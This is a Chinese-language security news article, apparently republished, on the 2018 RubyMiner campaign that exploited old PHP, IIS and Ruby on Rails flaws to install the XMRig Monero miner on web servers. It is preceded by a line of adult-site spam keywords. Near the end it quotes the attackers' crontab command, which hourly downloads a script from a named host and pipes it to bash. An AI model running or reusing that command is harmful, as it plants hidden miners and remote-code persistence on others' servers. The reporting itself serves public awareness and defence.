国产鲁鲁视频在线观看免费,国产日韩亚洲欧洲一区二区三区 ,黄色网址中文字幕

RubyMiner 挖礦程序 24 小時內影響全球 30% 的網絡

責任編輯：editor005

作者：AngelaY

2018-01-18 14:22:59

摘自：黑客與極客

近日，Check Point 的安全研究人員發現了 RubyMiner 惡意軟件家族，針對全球的 web 服務器發起攻擊，并試圖利用這些服務器挖掘門羅幣。攻擊者所使用的一個域名“lochjol com”在 2013 年也涉及到 Ruby on Rails 漏洞相關的攻擊。

近日，Check Point 的安全研究人員發現了 RubyMiner 惡意軟件家族，針對全球的 web 服務器發起攻擊，并試圖利用這些服務器挖掘門羅幣。24 小時內，全球 30% 的網絡都受到影響。

上周，全球 web 服務器遭遇了一場大規模攻擊，就在那時 RubyMiner 首次進入大眾視野。專家認為，此次攻擊背后的主要操控者只有一個人，盡在一天之內就入侵了全球近三分之一的網絡。

在過去的24小時內，全球 30％的網絡都遭遇了針對 web 服務器的加密貨幣挖礦攻擊。在此期間，該攻擊者試圖掃描全球網絡，從中找到易受攻擊的 web 服務器用于挖礦。主要受影響的國家是美國、德國、英國、挪威和瑞典，但全球其他國家也未能幸免。

意大利安全公司 Certego 也注意到 RubyMiner 從 1 月 10 日就開始發起攻擊：

從昨天（1月10日）23:00開始，我們的威脅情報平臺就已經開始大規模報告關于 ruby http 的利用。令人驚訝的是，黑客大量使用 2012 年和 2013 年發布和修補的舊漏洞，而且似乎并不打算隱藏自己的蹤跡，而是打算在最短的時間內感染大量的服務器。攻擊者選擇利用 HTTP Web 服務器中的多個漏洞，分發開源的 Monero 挖礦程序 XMRig。XMRig 在 2017 年 9 月利用 Microsoft IIS 6.0（Windows Server 2003 R2 中的 Web 服務器）中的漏洞進行攻擊。XMRig 通常會向開源代碼的作者捐贈 5％的挖礦所得。然而，攻擊者可能覺得 5% 也還是太多，因此從代碼中刪除了“捐贈元素”，將所有利潤據為己有。

RubyMiner 影響范圍包括 Windows 服務器也包括 Linux 服務器，主要利用 PHP、 Microsoft IIS 和 Ruby on Rails 中的漏洞來部署挖礦軟件。Certego 的分析報告顯示，惡意程序一直在利用 Ruby on Rails 中一個可造成遠程代碼執行的古老 CVE（CVE-2013-0156）漏洞。

　　PHP 服務器攻擊向量

　　Ruby on Rails 攻擊向量

RubyMiner 的具體攻擊過程如下：

攻擊者在 POST 請求內發送一個 base64 編碼的有效載荷，并誘導解釋器執行該有效載荷。這個惡意的有效載荷是一個 bash 腳本，其中添加了一個每小時運行一次的定時任務 cronjob，同時還下載了一個包含 shell 腳本的 robots.txt 文件，用于獲取并執行挖礦軟件。隨后調度程序執行命令，運行整個過程（包括每小時從服務器下載文件）。

cron 是一個基于 UNIX 的調度程序，可以通過自己的語法在固定的時間運行計劃好的任務。使用 -r 參數運行 crontab 命令將刪除現有 crontab 中的所有現有任務，并允授予礦工全部優先級。

echo “1 * * * * wget -q -O – http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1″|crontab –

攻擊者可以使用”1 * * * *“將新任務注入到干凈的 crontab 文件中，進而命令調度器每小時無限運行一分鐘。新任務將下載并執行“internetresearch.is”上托管的“robots.txt”文件，進而開始挖掘。